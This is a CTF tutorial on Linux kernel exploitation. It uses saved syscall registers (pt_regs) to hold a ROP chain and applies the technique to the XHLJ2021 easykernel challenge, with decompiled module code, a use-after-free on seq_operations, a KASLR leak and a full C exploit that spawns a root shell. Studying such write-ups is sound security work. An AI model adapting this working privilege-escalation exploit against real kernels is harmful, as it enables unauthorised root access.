Using pt_regs to Construct Universal Kernel ROP¶

System Calls and the pt_regs Structure¶

What does a system call actually involve? In user mode we load the arguments into the appropriate registers and execute the syscall instruction. The CPU then enters the kernel at entry_SYSCALL_64 (its address is taken from the MSR_LSTAR register rather than from a gate descriptor), and the kernel dispatches to the corresponding handler through the system call table.

Now let's look inside entry_SYSCALL_64, which is written in assembly. When the program enters kernel mode, this function pushes the user-mode registers onto the kernel stack, forming a pt_regs structure. The structure sits at the bottom of the kernel stack (that is, at its highest addresses) and is defined as follows:

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
    unsigned long orig_rax;
/* Return frame for iretq */
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
/* top of stack page */
};
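To make the layout concrete, here is a small user-space sketch that mirrors the structure and checks the offsets an exploit relies on. The names pt_regs_mirror and pt_regs_slot_offset are ours, chosen only for illustration, and the sketch assumes an LP64 x86-64 build where unsigned long is 8 bytes.

```c
#include <assert.h>
#include <stddef.h>

/* User-space mirror of the x86-64 pt_regs layout shown above.
 * "pt_regs_mirror" is a hypothetical name used only for this sketch. */
struct pt_regs_mirror {
    unsigned long r15, r14, r13, r12, rbp, rbx;               /* callee-preserved */
    unsigned long r11, r10, r9, r8, rax, rcx, rdx, rsi, rdi;  /* callee-clobbered */
    unsigned long orig_rax;                                   /* syscall number */
    unsigned long rip, cs, eflags, rsp, ss;                   /* iretq frame */
};

/* 21 slots of 8 bytes each; r15 is stored at the lowest address. */
_Static_assert(sizeof(struct pt_regs_mirror) == 21 * 8, "unexpected pt_regs size");

/* Byte offset of the n-th slot, counting from r15 (slot 0). */
static size_t pt_regs_slot_offset(size_t slot)
{
    assert(slot < sizeof(struct pt_regs_mirror) / sizeof(unsigned long));
    return slot * sizeof(unsigned long);
}
```

For example, pt_regs_slot_offset(1) is the offset of r14, and offsetof(struct pt_regs_mirror, rip) gives the start of the iretq frame.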

Kernel Stack and Universal ROP¶

The kernel stack has a small, fixed size (THREAD_SIZE, which is 16 KiB on current x86-64 kernels built without KASAN), and the pt_regs structure always sits at its bottom. As a result, when we hijack a function pointer in a kernel structure (e.g., seq_operations->start), the offset between rsp and pt_regs at the moment control is transferred is usually constant for a given kernel build and trigger path.

Most system calls do not use every register; r8 through r15, for example, are often free. Because their user-mode values are saved into pt_regs, we can use them to place a short ROP chain on the kernel stack, which leads to the following idea:

We only need to find a gadget of the form "add rsp, val ; ret" to complete the ROP
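The value of val can be worked out from two addresses read in a debugger. The sketch below is only an arithmetic helper under our own assumptions: the function names are hypothetical, and rsp_at_gadget means the value of rsp when the first instruction of the gadget executes. Gadgets that pop registers after the add are covered too, since every pop moves rsp by another 8 bytes.

```c
#include <assert.h>
#include <stdint.h>

/* Total distance a pivot gadget moves rsp before its final ret:
 * the immediate of "add rsp, imm" plus 8 bytes for every pop after it. */
static uint64_t gadget_shift(uint64_t add_imm, unsigned pops)
{
    return add_imm + 8ull * pops;
}

/* Shift needed so that the gadget's ret fetches its target from slot_addr.
 * rsp_at_gadget: rsp when the gadget starts executing (measured in a debugger).
 * slot_addr:     address of the pt_regs field holding the first chain entry. */
static uint64_t required_shift(uint64_t rsp_at_gadget, uint64_t slot_addr)
{
    assert(slot_addr >= rsp_at_gadget); /* pt_regs lies above the live frames */
    return slot_addr - rsp_at_gadget;
}
```

A gadget is usable when gadget_shift() for it equals required_shift() for the slot where the chain begins.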

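The following template loads recognizable values into the registers before issuing the system call, which makes pt_regs easy to spot in a debugger and the offset easy to measure (the assembly is written in Intel syntax, so it must be compiled with gcc -masm=intel):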

asm volatile(
    "mov r15,   0xbeefdead;"
    "mov r14,   0x11111111;"
    "mov r13,   0x22222222;"
    "mov r12,   0x33333333;"
    "mov rbp,   0x44444444;"
    "mov rbx,   0x55555555;"
    "mov r11,   0x66666666;"
    "mov r10,   0x77777777;"
    "mov r9,    0x88888888;"
    "mov r8,    0x99999999;"
    "xor rax,   rax;"
    "mov rcx,   0xaaaaaaaa;"
    "mov rdx,   8;"
    "mov rsi,   rsp;"
    "mov rdi,   seq_fd;"  // here we assume triggering through seq_operations->start
    "syscall"
);

Newer Kernel Countermeasures Against pt_regs-based Attacks¶

Defenders have responded to this technique. Mainline Linux added a random offset to the system call stack in the commit shown below (the feature is controlled by CONFIG_RANDOMIZE_KSTACK_OFFSET), which means the distance between pt_regs and rsp at the point where we hijack the kernel execution flow is no longer a fixed value:

diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
index 4efd39aacb9f2..7b2542b13ebd9 100644
--- a/arch/x86/entry/common.c
+++ b/arch/x86/entry/common.c
@@ -38,6 +38,7 @@
 #ifdef CONFIG_X86_64
 __visible noinstr void do_syscall_64(unsigned long nr, struct pt_regs *regs)
 {
+    add_random_kstack_offset();
     nr = syscall_enter_from_user_mode(regs, nr);

     instrumentation_begin();

Of course, if the random offset is small and enough registers remain under our control, we can fill the spare slots with slide gadgets (for example, the address of a bare ret) and still complete the exploit, although reliability drops significantly.
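The trade-off can be illustrated with a toy model. It is a simplification under our own assumptions, not a description of the kernel's actual offset distribution: the sled sits in the slots directly below the real chain, the pivot is tuned to hit the first chain slot when the extra offset is zero, and a larger offset makes the pivot land correspondingly lower. The function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if a pivot that lands extra_bytes lower than intended still
 * reaches the chain by sliding through sled_slots slots filled with "ret". */
static int pivot_still_works(size_t sled_slots, size_t extra_bytes)
{
    if (extra_bytes % 8 != 0)
        return 0;                       /* landing is not on a slot boundary */
    return extra_bytes / 8 <= sled_slots;
}

/* Count how many of the candidate offsets remain exploitable. */
static size_t count_survivable(size_t sled_slots, const size_t *offsets, size_t n)
{
    size_t ok = 0;

    assert(offsets != NULL || n == 0);
    for (size_t i = 0; i < n; i++)
        ok += (size_t)pivot_still_works(sled_slots, offsets[i]);
    return ok;
}
```

With only a handful of spare registers the sled is short, so only a small fraction of the possible offsets survives, which is why the attack becomes unreliable.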

Example: West Lake Sword 2021 Online Qualifier - easykernel¶

The challenge files can be downloaded from https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/kernel-mode/XHLJ2021-easykernel.

Analysis¶

First, examining the startup script, we can see that SMEP and KASLR are enabled:

#!/bin/sh

qemu-system-x86_64  \
-m 64M \
-cpu kvm64,+smep \
-kernel ./bzImage \
-initrd rootfs.img \
-nographic \
-s \
-append "console=ttyS0 kaslr quiet noapic"

Entering the challenge environment and checking /sys/devices/system/cpu/vulnerabilities/*, we can see that PTI (page table isolation) is enabled:

/ $ cat /sys/devices/system/cpu/vulnerabilities/*
KVM: Mitigation: VMX unsupported
Mitigation: PTE Inversion
Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown
Mitigation: PTI
Vulnerable
Mitigation: usercopy/swapgs barriers and __user pointer sanitization
Mitigation: Full generic retpoline, STIBP: disabled, RSB filling
Not affected
Not affected

The challenge provides a test.ko file. Loading it into IDA, we find that the module implements only an ioctl handler. It is a typical "menu heap" challenge that lets us allocate, free, read, and write objects. To allocate an object, we pass in a structure of the following form:

struct
{
    size_t size;
    void *buf;
};

To free, read, or write an object, we pass in a structure of the following form:

struct 
{
    size_t idx;
    size_t size;
    void *buf;
};

Allocation: 0x20¶

A plain kmalloc with no upper bound on the size. At most 0x20 objects can be held at once:

 v7 = _kmalloc(v12, 3264LL);
  v8 = v7;
  if ( !v7 )
    return 0LL;
  v9 = v12;
  v10 = v13;
  if ( v12 > 0x7FFFFFFF )
    goto LABEL_29;
  _check_object_size(v7, v12, 0LL);
  v11 = copy_from_user(v8, v10, v9);
  if ( v11 )
    return 0LL;
  while ( addrList[v11] )
  {
    if ( ++v11 == 32 )
      return 0LL;
  }
  addrList[(int)v11] = v8;
  return 0LL;
}

Free: 0x30¶

The pointer is not cleared after kfree, giving us a blatant UAF vulnerability right away:

  if ( a2 != 32 )
  {
    if ( a2 != 48 )
      return result;
    if ( !copy_from_user(&v12, v2, 8LL) )
    {
      if ( (unsigned int)v12 <= 0x20 )
      {
        if ( addrList[(unsigned int)v12] )
          kfree();
      }
      return 0LL;
    }
    return -22LL;
  }
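The difference between the buggy free path and a correct one can be shown with a toy user-space model. This is not the module's code: the table, the function names, and the use of malloc/free in place of kmalloc/kfree are all stand-ins chosen for illustration. Addresses are stored as integers so the model can inspect a stale entry without dereferencing freed memory.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

#define MODEL_SLOTS 32

/* Toy stand-in for the module's pointer table. */
static uintptr_t model_list[MODEL_SLOTS];

/* Store a fresh allocation in the first empty slot; returns its index or -1. */
static int model_alloc(size_t size)
{
    for (int i = 0; i < MODEL_SLOTS; i++) {
        if (model_list[i] == 0) {
            model_list[i] = (uintptr_t)malloc(size);
            return model_list[i] ? i : -1;
        }
    }
    return -1;
}

/* Buggy free, as in the challenge: the slot keeps its stale address. */
static void model_free_buggy(unsigned idx)
{
    assert(idx < MODEL_SLOTS);
    free((void *)model_list[idx]);
}

/* Fixed free: clearing the slot removes the dangling reference. */
static void model_free_fixed(unsigned idx)
{
    assert(idx < MODEL_SLOTS);
    free((void *)model_list[idx]);
    model_list[idx] = 0;
}
```

After model_free_buggy() the slot still passes the "is this entry non-null" check, so later read and write requests would operate on memory that the allocator may already have handed to someone else.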

Read: 0x40¶

Calls the show function:

  if ( a2 == 64 )
  {
    if ( !copy_from_user(&v12, v2, 24LL) )
    {
      show(&v12);
      return 0LL;
    }
    return -22LL;
  }

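show first copies a fixed 0x100 bytes from the object into a stack buffer, then copies the requested size (at most 0x100) from that buffer to user space, with a hardened usercopy check applied to the stack buffer: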

__int64 __fastcall show(_QWORD *a1)
{
  const void *v1; // rsi
  unsigned __int64 v2; // r13
  __int64 v3; // r14
  _QWORD v5[37]; // [rsp-128h] [rbp-128h] BYREF

  _fentry__();
  v5[32] = __readgsqword(0x28u);
  v5[0] = 0LL;
  memset(&v5[1], 0, 0xF8uLL);
  if ( (unsigned int)*a1 > 0x20 )
    return 0xFFFFFFFFLL;
  v1 = (const void *)addrList[(unsigned int)*a1];
  if ( !v1 )
    return 0xFFFFFFFFLL;
  v2 = a1[1];
  v3 = a1[2];
  qmemcpy(v5, v1, 0x100uLL);
  if ( v2 > 0x100 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 256LL, v2);
    BUG();
  }
  _check_object_size(v5, v2, 1LL);
  return copy_to_user(v3, v5, v2) != 0 ? 0xFFFFFFEA : 0;
}

Write: 0x50¶

Standard object write:

  if ( a2 > 0x40 )
  {
    if ( a2 == 80 )
    {
      if ( copy_from_user(&v12, v2, 24LL) )
        return -22LL;
      if ( (unsigned int)v12 <= 0x20 )
      {
        v4 = addrList[(unsigned int)v12];
        if ( v4 )
        {
          v5 = v13;
          v6 = v14;
          if ( v13 <= 0x7FFFFFFF )
          {
            _check_object_size(addrList[(unsigned int)v12], v13, 0LL);
            copy_from_user(v4, v6, v5);
            return 0LL;
          }
LABEL_29:
          BUG();
        }
      }
    }
    return 0LL;
  }

Solution: UAF + seq_operations + pt_regs + ROP¶

Since we have a direct UAF vulnerability with no size limit, there are many possible solutions. Let's first consider how to hijack the kernel execution flow. A natural target is a dynamically allocated function table. For example, the seq_operations structure is allocated from kmalloc-32.

When we open a stat file (e.g., /proc/self/stat), a seq_operations structure is allocated in kernel space. This structure is defined in include/linux/seq_file.h and contains only four function pointers:

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};
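A quick user-space check shows why this object fits the 32-byte cache and why the first 8-byte word of the object is the start pointer. The mirror type and helper below are hypothetical names for this sketch only, loff_model_t stands in for the kernel's loff_t, and an x86-64 build with 8-byte pointers is assumed.

```c
#include <assert.h>
#include <stddef.h>

struct seq_file;                 /* opaque here; only pointers to it are used */
typedef long long loff_model_t;  /* stand-in for the kernel's loff_t */

/* User-space mirror of struct seq_operations. */
struct seq_operations_mirror {
    void *(*start)(struct seq_file *m, loff_model_t *pos);
    void  (*stop)(struct seq_file *m, void *v);
    void *(*next)(struct seq_file *m, void *v, loff_model_t *pos);
    int   (*show)(struct seq_file *m, void *v);
};

/* Four 8-byte pointers: exactly 0x20 bytes, with start at offset 0. */
_Static_assert(sizeof(struct seq_operations_mirror) == 0x20, "expected 32 bytes");
_Static_assert(offsetof(struct seq_operations_mirror, start) == 0, "start is first");

/* Index of a member when the object is viewed as an array of 8-byte words. */
static size_t word_index(size_t member_offset)
{
    assert(member_offset % sizeof(void *) == 0);
    return member_offset / sizeof(void *);
}
```

Viewed through a size_t array that overlays the freed object, word 0 therefore corresponds to start and word 3 to show.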

When we read a stat file, the kernel calls its proc_ops' proc_read_iter pointer, whose default value is the seq_read_iter() function, defined in fs/seq_file.c. Note the following logic:

ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    struct seq_file *m = iocb->ki_filp->private_data;
    //...
    p = m->op->start(m, &m->index);
    //...

That is, it calls the start function pointer in seq_operations. So we only need to control seq_operations->start and then read the corresponding stat file to control the kernel execution flow.

Once we control the kernel execution flow, the next step is privilege escalation. We place a ROP chain in pt_regs and use a gadget of the form add rsp, val ; ret to reach it; the chain calls commit_creds(&init_cred). Note that KPTI is enabled, so the chain must end by returning to user mode through the swapgs_restore_regs_and_return_to_usermode function.
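The mapping from chain entries to saved registers can be sketched as follows. This is an illustrative helper with hypothetical names, assuming the pivot gadget makes its ret fetch from the r14 slot, so that r15 only carries a marker value. Slots are numbered in 8-byte words from the lowest address of pt_regs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Slot indices within pt_regs, counted in 8-byte words from r15. */
enum { SLOT_R15, SLOT_R14, SLOT_R13, SLOT_R12, SLOT_RBP, SLOT_COUNT };

/* Fill the five callee-preserved slots the way the chain needs them. */
static void layout_chain(uint64_t slots[SLOT_COUNT],
                         uint64_t pop_rdi_ret, uint64_t init_cred,
                         uint64_t commit_creds, uint64_t ret_to_user)
{
    assert(slots != NULL);
    slots[SLOT_R15] = 0xbeefdead;   /* marker only, not executed */
    slots[SLOT_R14] = pop_rdi_ret;  /* first ret target: pop rdi ; ret */
    slots[SLOT_R13] = init_cred;    /* value popped into rdi */
    slots[SLOT_R12] = commit_creds; /* runs as commit_creds(&init_cred) */
    slots[SLOT_RBP] = ret_to_user;  /* KPTI-aware return to user mode */
}
```

Because the registers are saved in this fixed order on syscall entry, loading them in user mode is enough to place the chain on the kernel stack.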

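The final exploit is as follows. The inline assembly is written in Intel syntax and refers to global variables by name, so it should be built with gcc -masm=intel (typically together with -static):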

/**
 * Copyright (c) 2021 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/ioctl.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

size_t swapgs_restore_regs_and_return_to_usermode;
size_t init_cred;
size_t pop_rdi_ret;
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t commit_creds;
size_t gadget;

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

/**
 * Challenge Interface
**/

struct chal_karg_type1 {
    size_t  idx;
    size_t  size;
    void    *buf;
};

struct chal_karg_type2 {
    size_t  size;
    void    *buf;
};

void alloc_chunk(long dev_fd, size_t size, void *buf)
{
    struct chal_karg_type2 arg = {
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x20, &arg);
}

void delete_chunk(long dev_fd, size_t idx)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
    };
    ioctl(dev_fd, 0x30, &arg);
}

void read_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x40, &arg);
}

void write_chunk(long dev_fd, size_t idx, size_t size, void *buf)
{
    struct chal_karg_type1 arg = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };
    ioctl(dev_fd, 0x50, &arg);
}

/**
 * Exploitation
**/

#define COMMIT_CREDS 0xffffffff810c8d40
#define SEQ_OPS_0 0xffffffff81319d30
#define INIT_CRED 0xffffffff82663300
#define POP_RDI_RET 0xffffffff81089250
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30

size_t buf[0x100];
int seq_fd;

void exploitation(void)
{
    int dev_fd;

    dev_fd = open("/dev/kerpwn", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open the /dev/kerpwn file!");
    }

    puts(INFO_MSG("[*] Allocating object and UAF as seq_operations..."));
    alloc_chunk(dev_fd, 0x20, buf);
    delete_chunk(dev_fd, 0);
    seq_fd = open("/proc/self/stat", O_RDONLY);
    read_chunk(dev_fd, 0, 0x20, buf);

    kernel_offset = buf[0] - SEQ_OPS_0;
    kernel_base += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + kernel_offset;
    init_cred = INIT_CRED + kernel_offset;
    pop_rdi_ret = POP_RDI_RET + kernel_offset;
    commit_creds = COMMIT_CREDS + kernel_offset;
    /* stack-pivot gadget of the "add rsp, val ; ret" kind, specific to this kernel image */
    gadget = 0xffffffff8135b0f6 + kernel_offset;

    printf(
        SUCCESS_MSG("[+] Got kernel base: ") "%lx"
        SUCCESS_MSG(" , kaslr offset: ") "%lx\n",
        kernel_base,
        kernel_offset
    );

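    buf[0] = gadget; // seq_operations->start
    // +9 skips the first pops of the function (r15, r14, r13, r12, rbp),
    // so the remaining pops consume the rest of pt_regs
    swapgs_restore_regs_and_return_to_usermode += 9;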
    write_chunk(dev_fd, 0, 0x20, buf);

    puts(INFO_MSG("[*] Triggering evil seq_operations..."));

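    asm volatile(
        "mov r15, 0xbeefdead;" // marker value, not part of the chain
        "mov r14, pop_rdi_ret;" // ROP chain starts here: pop rdi ; ret
        "mov r13, init_cred;" // rdi = &init_cred
        "mov r12, commit_creds;" // commit_creds(&init_cred)
        "mov rbp, swapgs_restore_regs_and_return_to_usermode;" // return to user mode, ends in iret(q)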
        "mov rbx, 0x999999999;"
        "mov r11, 0x114514;"
        "mov r10, 0x666666666;"
        "mov r9, 0x1919114514;"
        "mov r8, 0xabcd1919810;"
        "xor rax, rax;"
        "mov rcx, 0x666666;"
        "mov rdx, 8;"
        "mov rsi, rsp;"
        "mov rdi, seq_fd;"
        "syscall"
    );

    get_root_shell();
}

int main(int argc, char ** argv, char ** envp)
{
    exploitation();
    return 0;
}

Reference¶

https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/

https://arttnba3.cn/2021/11/29/PWN-0X02-LINUX-KERNEL-PWN-PART-II/